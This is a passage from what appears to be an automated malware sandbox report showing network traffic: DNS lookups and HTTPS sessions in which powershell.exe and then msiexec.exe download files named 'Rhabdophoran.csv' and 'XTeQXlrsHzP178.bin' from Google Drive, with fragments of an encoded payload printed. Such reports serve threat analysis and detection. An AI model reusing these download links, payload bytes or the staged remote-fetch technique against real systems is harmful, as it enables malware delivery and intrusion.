                                                      Oct 1, 2024 07:43:06.420516968 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420521975 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.420552969 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420557022 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.420586109 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420591116 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.420624971 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420634031 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.420672894 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420727015 CEST49739443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:43:06.420757055 CEST44349739142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:43:06.420811892 CEST49739443192.168.2.4142.250.185.97

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 1, 2024 07:42:13.508440971 CEST5250653192.168.2.41.1.1.1
                                                      Oct 1, 2024 07:42:13.518024921 CEST53525061.1.1.1192.168.2.4
                                                      Oct 1, 2024 07:42:14.631043911 CEST5387753192.168.2.41.1.1.1
                                                      Oct 1, 2024 07:42:14.639878035 CEST53538771.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 1, 2024 07:42:13.508440971 CEST192.168.2.41.1.1.10x21f1Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Oct 1, 2024 07:42:14.631043911 CEST192.168.2.41.1.1.10x1c13Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 1, 2024 07:42:13.518024921 CEST1.1.1.1192.168.2.40x21f1No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                      Oct 1, 2024 07:42:14.639878035 CEST1.1.1.1192.168.2.40x1c13No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • drive.google.com
                                                      • drive.usercontent.google.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730142.250.184.2064437592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-01 05:42:14 UTC215OUTGET /uc?export=download&id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-01 05:42:14 UTC1610INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 01 Oct 2024 05:42:14 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-hWI9U_XYMyxbmsas5JtSIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449731142.250.185.974437592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-01 05:42:15 UTC233OUTGET /download?id=1mVvsIVW7-x9DjCo7uv1ZOoZtTNzVEFB5&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-01 05:42:18 UTC4856INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="Rhabdophoran.csv"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 482192
                                                      Last-Modified: Mon, 30 Sep 2024 16:03:03 GMT
                                                      X-GUploader-UploadID: AD-8ljt3OFAvQt2chlFkJ4qm32ljXxHk2xBo73nLUqK7Ke2jhQLrEysmMhbVpMZugpsGPyt9eZ4s6F9a3g
                                                      Date: Tue, 01 Oct 2024 05:42:17 GMT
                                                      Expires: Tue, 01 Oct 2024 05:42:17 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=w4AnWQ==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2024-10-01 05:42:18 UTC4856INData Raw: 36 77 49 6a 4c 65 73 43 36 52 53 37 61 36 51 55 41 4f 73 43 62 45 78 78 41 5a 73 44 58 43 51 45 63 51 47 62 63 51 47 62 75 65 58 65 5a 41 52 78 41 5a 76 72 41 75 39 4a 67 66 45 44 73 4c 35 6a 36 77 49 47 48 33 45 42 6d 34 48 78 35 6d 37 61 5a 33 45 42 6d 33 45 42 6d 33 45 42 6d 2b 73 43 39 51 4f 36 64 47 79 4a 32 65 73 43 37 6e 33 72 41 68 33 45 63 51 47 62 63 51 47 62 4d 63 72 72 41 73 6b 48 36 77 4c 6d 75 6f 6b 55 43 33 45 42 6d 2b 73 43 63 2f 33 52 34 75 73 43 6e 71 6c 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 6f 33 73 67 66 6c 56 48 72 45 43 66 4d 74 78 41 5a 76 72 41 67 69 72 69 30 51 6b 42 4f 73 43 6b 53 5a 78 41 5a 75 4a 77 2b 73 43 70 7a 31 78 41 5a 75 42 77 32 34 36 45 67 4a 78 41 5a 74 78 41 5a 75 36 4a 4c 44 57 43 33 45 42 6d 33 45 42 6d 34 48
                                                      Data Ascii: 6wIjLesC6RS7a6QUAOsCbExxAZsDXCQEcQGbcQGbueXeZARxAZvrAu9JgfEDsL5j6wIGH3EBm4Hx5m7aZ3EBm3EBm3EBm+sC9QO6dGyJ2esC7n3rAh3EcQGbcQGbMcrrAskH6wLmuokUC3EBm+sCc/3R4usCnqlxAZuDwQRxAZvrAo3sgflVHrECfMtxAZvrAgiri0QkBOsCkSZxAZuJw+sCpz1xAZuBw246EgJxAZtxAZu6JLDWC3EBm3EBm4H
                                                      2024-10-01 05:42:18 UTC4856INData Raw: 47 69 4d 73 71 6f 35 59 2f 58 6a 34 78 49 6f 57 79 4e 49 6c 59 47 61 70 38 76 2b 74 51 32 4a 30 39 75 6b 63 6a 30 51 4d 55 31 6f 6a 71 4b 6b 2b 58 36 78 58 6c 2f 51 62 4e 53 32 64 79 67 57 72 51 6d 64 73 7a 41 6c 51 4a 73 51 4c 45 72 31 64 48 4d 54 52 52 6e 33 77 61 41 75 49 36 4d 58 77 41 47 45 4b 47 6a 61 33 52 4d 4f 4b 36 4a 68 36 46 30 5a 42 70 41 70 65 76 6c 6d 78 51 39 6e 55 58 62 51 59 65 4f 4d 62 73 4c 76 68 4e 58 54 6a 36 73 6f 46 71 7a 4d 48 53 2f 41 4a 36 30 61 38 59 7a 4d 71 72 32 61 39 42 4e 2f 64 71 45 71 78 59 74 64 47 72 58 55 54 47 55 4c 45 74 4d 61 66 49 65 31 51 6f 71 74 5a 41 2f 69 5a 77 79 54 41 66 64 63 33 63 41 41 62 69 53 77 2f 37 6f 32 36 44 72 57 32 70 73 43 36 30 6d 33 6c 66 71 38 42 35 41 67 30 74 6c 2b 52 4f 39 6c 5a 77 74 65
                                                      Data Ascii: GiMsqo5Y/Xj4xIoWyNIlYGap8v+tQ2J09ukcj0QMU1ojqKk+X6xXl/QbNS2dygWrQmdszAlQJsQLEr1dHMTRRn3waAuI6MXwAGEKGja3RMOK6Jh6F0ZBpApevlmxQ9nUXbQYeOMbsLvhNXTj6soFqzMHS/AJ60a8YzMqr2a9BN/dqEqxYtdGrXUTGULEtMafIe1QoqtZA/iZwyTAfdc3cAAbiSw/7o26DrW2psC60m3lfq8B5Ag0tl+RO9lZwte
                                                      2024-10-01 05:42:18 UTC132INData Raw: 74 4f 50 45 53 7a 48 63 66 73 79 62 34 2b 4c 4b 77 6d 6f 79 63 53 6f 4f 42 6a 6c 52 4a 51 62 43 4f 74 4d 48 69 5a 45 6e 76 2b 70 6a 44 2b 38 4a 69 73 36 32 2f 55 30 63 43 63 44 43 58 69 2f 50 34 32 58 6d 73 45 78 76 50 56 4d 71 7a 47 51 51 2f 57 4a 31 36 66 46 58 39 47 56 45 42 75 31 35 68 5a 4b 44 2f 6f 79 2f 5a 4d 45 73 4c 2f 55 74 62 6e 55 6f 38 76 6f 32 76 35 69 68 6b 6b 7a 47 44 49 33 46
                                                      Data Ascii: tOPESzHcfsyb4+LKwmoycSoOBjlRJQbCOtMHiZEnv+pjD+8Jis62/U0cCcDCXi/P42XmsExvPVMqzGQQ/WJ16fFX9GVEBu15hZKD/oy/ZMEsL/UtbnUo8vo2v5ihkkzGDI3F
                                                      2024-10-01 05:42:18 UTC1321INData Raw: 53 31 65 41 41 6e 73 78 6a 38 56 4c 4d 59 2f 46 53 7a 47 50 78 55 73 78 6a 38 56 4c 4d 59 2f 46 53 7a 47 50 78 55 73 78 6a 38 56 4c 4d 59 4d 6f 65 53 30 4b 6f 41 62 6e 2b 4f 58 45 71 33 37 71 32 63 44 73 50 50 49 6d 59 66 4a 32 50 6f 2f 52 62 7a 47 50 78 55 73 78 6a 38 56 4c 4d 59 2f 46 53 7a 47 50 78 55 73 78 6a 38 56 4c 4d 59 2f 46 53 7a 47 50 78 55 73 78 6d 73 78 79 50 55 75 74 45 57 41 4d 52 4c 70 36 50 63 64 37 2f 62 4f 2f 45 74 73 6e 57 62 62 4b 32 4a 48 38 73 4a 45 49 43 54 43 5a 47 58 76 75 2f 56 64 55 75 4e 31 5a 79 34 47 4d 2f 6b 31 6c 6e 70 47 73 6f 7a 74 32 49 6a 66 64 34 6d 6e 62 4d 45 53 36 4a 48 62 7a 77 6d 4d 31 66 7a 50 4c 66 45 53 35 6c 4e 59 4d 47 37 42 39 32 6d 73 43 4c 4a 54 58 75 47 37 45 57 71 79 32 4e 54 49 42 73 54 51 74 6e 38 35
                                                      Data Ascii: S1eAAnsxj8VLMY/FSzGPxUsxj8VLMY/FSzGPxUsxj8VLMYMoeS0KoAbn+OXEq37q2cDsPPImYfJ2Po/RbzGPxUsxj8VLMY/FSzGPxUsxj8VLMY/FSzGPxUsxmsxyPUutEWAMRLp6Pcd7/bO/EtsnWbbK2JH8sJEICTCZGXvu/VdUuN1Zy4GM/k1lnpGsozt2Ijfd4mnbMES6JHbzwmM1fzPLfES5lNYMG7B92msCLJTXuG7EWqy2NTIBsTQtn85
                                                      2024-10-01 05:42:18 UTC1390INData Raw: 30 76 58 66 6c 45 4a 75 4f 59 6e 5a 50 2f 69 6a 4b 71 4b 37 65 67 66 65 71 6d 66 50 49 46 79 49 61 68 55 44 50 78 50 49 78 47 6d 37 76 42 79 65 63 4e 61 55 7a 7a 7a 4f 72 68 55 68 6c 50 2b 67 6d 5a 44 42 4c 77 67 4a 34 6e 59 65 6d 47 50 72 55 54 4b 39 75 56 45 36 55 6b 4f 4b 6d 64 74 53 7a 7a 43 4e 6b 65 46 46 52 42 79 4e 64 52 6b 47 30 4a 51 4c 53 48 61 54 75 4b 54 78 4d 66 38 53 33 43 53 6e 7a 66 65 46 35 69 77 6a 66 34 68 30 79 56 58 49 4d 31 6c 6b 51 69 32 68 50 77 32 4c 70 70 2b 64 52 67 34 36 51 53 4a 31 47 6f 4b 51 34 73 75 59 45 51 6a 6b 6e 61 31 44 61 43 75 65 47 6d 52 76 4a 5a 35 7a 59 36 53 6b 6a 47 38 68 68 5a 4e 52 54 31 79 69 46 4b 41 30 31 36 5a 66 62 6a 63 63 67 4b 56 38 35 4c 36 44 65 34 45 2f 6c 74 64 6c 4c 72 4e 74 38 33 6f 36 42 5a 36
                                                      Data Ascii: 0vXflEJuOYnZP/ijKqK7egfeqmfPIFyIahUDPxPIxGm7vByecNaUzzzOrhUhlP+gmZDBLwgJ4nYemGPrUTK9uVE6UkOKmdtSzzCNkeFFRByNdRkG0JQLSHaTuKTxMf8S3CSnzfeF5iwjf4h0yVXIM1lkQi2hPw2Lpp+dRg46QSJ1GoKQ4suYEQjkna1DaCueGmRvJZ5zY6SkjG8hhZNRT1yiFKA016ZfbjccgKV85L6De4E/ltdlLrNt83o6BZ6
                                                      2024-10-01 05:42:18 UTC1390INData Raw: 7a 76 71 59 41 42 41 5a 43 56 34 57 36 4c 6c 6c 4f 63 45 78 62 47 6b 4f 71 66 34 74 71 61 7a 36 61 66 66 6c 7a 4c 6d 76 7a 4c 45 36 39 36 53 67 55 45 66 59 52 54 76 6b 30 57 59 4e 66 66 6c 50 46 4c 48 57 5a 62 4e 64 46 4d 7a 68 4d 79 73 37 52 63 54 71 30 59 44 5a 50 4b 35 44 65 52 4c 6f 75 69 4f 75 50 73 45 36 54 71 30 48 6c 54 46 4b 63 5a 73 74 53 79 77 44 49 46 47 52 72 7a 65 33 63 44 57 74 77 65 31 77 49 53 4d 65 45 35 38 58 56 33 58 37 32 5a 36 35 2b 52 31 2b 4a 77 64 35 2f 73 4a 30 4c 56 6f 76 4c 6d 2b 39 74 43 69 67 71 31 6b 37 57 47 59 37 46 53 37 6a 58 77 42 79 4f 73 55 73 64 6b 51 34 79 59 50 30 4d 75 38 72 47 7a 54 76 6e 58 51 34 79 64 4c 72 6e 4d 73 72 47 35 2f 4e 61 64 4e 6c 5a 77 74 65 4f 2b 39 59 49 65 62 74 6f 31 38 66 72 41 2b 7a 48 75 62
                                                      Data Ascii: zvqYABAZCV4W6LllOcExbGkOqf4tqaz6afflzLmvzLE696SgUEfYRTvk0WYNfflPFLHWZbNdFMzhMys7RcTq0YDZPK5DeRLouiOuPsE6Tq0HlTFKcZstSywDIFGRrze3cDWtwe1wISMeE58XV3X72Z65+R1+Jwd5/sJ0LVovLm+9tCigq1k7WGY7FS7jXwByOsUsdkQ4yYP0Mu8rGzTvnXQ4ydLrnMsrG5/NadNlZwteO+9YIebto18frA+zHub
                                                      2024-10-01 05:42:18 UTC1390INData Raw: 59 33 4c 38 47 37 4c 59 7a 73 6b 57 4b 62 72 4d 49 52 42 58 62 58 4d 56 37 73 75 44 64 4b 63 57 35 69 44 4b 42 49 6f 6a 31 5a 57 72 63 6c 4d 66 56 2f 33 42 4f 43 75 77 64 72 5a 6e 67 6e 65 50 64 6f 52 6e 4c 4f 52 49 69 54 6f 71 43 49 52 46 76 6d 57 57 4b 62 31 36 42 77 6a 73 2f 49 33 30 59 32 36 71 69 43 37 5a 4a 4d 51 63 32 42 33 56 47 73 69 2b 52 39 59 6d 71 4b 62 76 66 41 58 6e 4d 72 41 63 37 6c 4a 55 41 34 73 56 7a 66 6b 6e 52 79 4f 41 72 2f 54 58 41 34 79 75 47 6c 54 53 38 72 65 4d 6f 75 4d 79 77 34 79 69 75 50 7a 4c 52 75 74 42 69 56 4b 43 52 4a 42 67 30 4b 75 66 38 67 4e 6a 45 37 56 74 59 39 33 45 72 2b 7a 4c 64 48 75 45 4d 6a 55 33 73 36 36 78 56 71 44 6f 43 6b 76 37 52 42 61 4a 59 48 54 6e 6e 67 6f 32 49 2b 6b 30 52 39 4e 4a 62 34 39 2f 65 38 4c
                                                      Data Ascii: Y3L8G7LYzskWKbrMIRBXbXMV7suDdKcW5iDKBIoj1ZWrclMfV/3BOCuwdrZngnePdoRnLORIiToqCIRFvmWWKb16Bwjs/I30Y26qiC7ZJMQc2B3VGsi+R9YmqKbvfAXnMrAc7lJUA4sVzfknRyOAr/TXA4yuGlTS8reMouMyw4yiuPzLRutBiVKCRJBg0Kuf8gNjE7VtY93Er+zLdHuEMjU3s66xVqDoCkv7RBaJYHTnngo2I+k0R9NJb49/e8L
                                                      2024-10-01 05:42:18 UTC1390INData Raw: 4f 42 49 32 49 4b 53 30 59 72 51 59 6d 53 6a 6f 53 51 49 78 49 6e 75 43 65 53 4a 43 62 42 7a 49 49 69 4a 61 41 71 5a 2f 41 4f 43 33 76 6e 48 63 4f 4f 78 31 66 35 36 62 4f 70 6a 50 47 70 6d 6d 57 4b 4f 57 76 68 6b 47 2b 61 75 6c 41 69 57 67 4f 4e 44 63 69 65 51 72 4b 77 44 74 44 5a 76 50 65 54 73 5a 4d 6a 73 56 4c 32 57 4a 74 54 7a 48 64 66 36 58 35 57 6e 37 4b 77 31 36 55 53 2b 41 4f 4e 37 50 48 56 41 50 4b 32 78 52 52 6e 44 30 4f 4c 30 77 56 75 56 72 43 49 32 6a 47 78 45 31 5a 57 4a 48 33 63 69 42 38 6a 4a 6a 71 61 43 55 58 54 55 52 70 49 4f 30 33 76 48 59 6b 49 79 68 77 49 58 38 2f 6a 4e 35 76 52 6b 74 69 2b 78 61 44 4c 68 6b 52 67 46 64 54 61 30 4f 49 55 72 38 51 51 4c 76 44 4d 68 38 41 6d 56 79 55 4b 45 41 63 46 33 4b 4d 51 74 70 76 43 63 67 70 66 73
                                                      Data Ascii: OBI2IKS0YrQYmSjoSQIxInuCeSJCbBzIIiJaAqZ/AOC3vnHcOOx1f56bOpjPGpmmWKOWvhkG+aulAiWgONDcieQrKwDtDZvPeTsZMjsVL2WJtTzHdf6X5Wn7Kw16US+AON7PHVAPK2xRRnD0OL0wVuVrCI2jGxE1ZWJH3ciB8jJjqaCUXTURpIO03vHYkIyhwIX8/jN5vRkti+xaDLhkRgFdTa0OIUr8QQLvDMh8AmVyUKEAcF3KMQtpvCcgpfs
                                                      2024-10-01 05:42:18 UTC1390INData Raw: 57 32 51 36 64 65 7a 4c 57 47 45 69 54 39 4d 46 59 61 64 33 54 6e 75 51 58 61 35 6f 4a 58 36 6b 58 6f 47 65 4d 6f 77 6a 38 55 64 6a 37 38 4d 6e 4f 4d 4f 4b 38 39 70 72 41 33 4b 78 33 4d 4d 6d 45 59 4f 41 38 71 61 46 30 66 43 44 38 76 2b 39 4a 47 5a 6d 42 6e 48 47 51 36 53 77 73 56 4b 4a 47 48 63 56 34 6c 4b 38 65 43 35 30 34 62 43 68 51 46 31 57 4a 6b 6b 37 73 47 73 36 38 63 71 58 6f 58 52 65 75 69 53 4b 48 74 45 39 72 37 30 53 7a 47 50 78 55 73 78 6a 38 56 4c 4d 59 2f 46 53 7a 47 50 78 55 73 78 6a 38 56 4c 4d 59 2f 46 53 7a 47 50 78 55 73 2b 35 71 62 70 75 6f 68 51 78 32 7a 50 67 63 63 58 66 50 6a 4b 39 6f 61 32 53 6e 67 4f 41 6b 56 36 5a 38 37 4b 33 6a 57 6b 32 69 4c 59 54 76 61 77 6a 73 56 4c 59 44 61 6e 66 43 6d 53 52 4c 70 52 4b 77 6a 6e 73 45 34 6d
                                                      Data Ascii: W2Q6dezLWGEiT9MFYad3TnuQXa5oJX6kXoGeMowj8Udj78MnOMOK89prA3Kx3MMmEYOA8qaF0fCD8v+9JGZmBnHGQ6SwsVKJGHcV4lK8eC504bChQF1WJkk7sGs68cqXoXReuiSKHtE9r70SzGPxUsxj8VLMY/FSzGPxUsxj8VLMY/FSzGPxUs+5qbpuohQx2zPgccXfPjK9oa2SngOAkV6Z87K3jWk2iLYTvawjsVLYDanfCmSRLpRKwjnsE4m
                                                      2024-10-01 05:42:18 UTC1390INData Raw: 55 4b 32 6e 66 66 51 59 6b 4f 72 39 2b 64 71 38 4e 56 68 77 6b 42 6a 64 57 42 74 55 7a 6b 70 30 31 37 6f 53 45 47 70 58 47 30 34 53 41 2f 57 2f 49 38 55 35 32 41 49 4b 73 52 74 79 72 42 62 63 39 30 48 54 42 79 4b 49 6c 54 62 4c 76 71 35 38 61 55 70 79 70 56 7a 6f 69 6f 58 49 54 57 55 55 4e 59 47 51 4f 38 57 38 6c 4f 57 49 38 73 49 76 68 4f 2b 70 6e 30 63 6f 46 71 34 73 52 52 4c 67 73 63 7a 43 50 78 51 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41 41 41 4b 41
                                                      Data Ascii: UK2nffQYkOr9+dq8NVhwkBjdWBtUzkp017oSEGpXG04SA/W/I8U52AIKsRtyrBbc90HTByKIlTbLvq58aUpypVzoioXITWUUNYGQO8W8lOWI8sIvhO+pn0coFq4sRRLgsczCPxQAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKAAAKA


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449738142.250.184.2064437272C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-01 05:43:02 UTC216OUTGET /uc?export=download&id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2024-10-01 05:43:02 UTC1610INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Tue, 01 Oct 2024 05:43:02 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-A7Zsgnoc913BVp7YDePNXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449739142.250.185.974437272C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-01 05:43:03 UTC258OUTGET /download?id=17Ed0BzToN3ez5R1ZegL6CXKwX1COgAju&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-01 05:43:05 UTC4858INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="XTeQXlrsHzP178.bin"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 494656
                                                      Last-Modified: Mon, 30 Sep 2024 16:01:32 GMT
                                                      X-GUploader-UploadID: AD-8ljtg6FxSKtoOxJSd6FgubPW1D3u5-tRpStDgaRV5USd_Sm7ZnarLhvzRd9OqfYRvUfrCknc5rWzdnQ
                                                      Date: Tue, 01 Oct 2024 05:43:05 GMT
                                                      Expires: Tue, 01 Oct 2024 05:43:05 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=RbXsqA==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
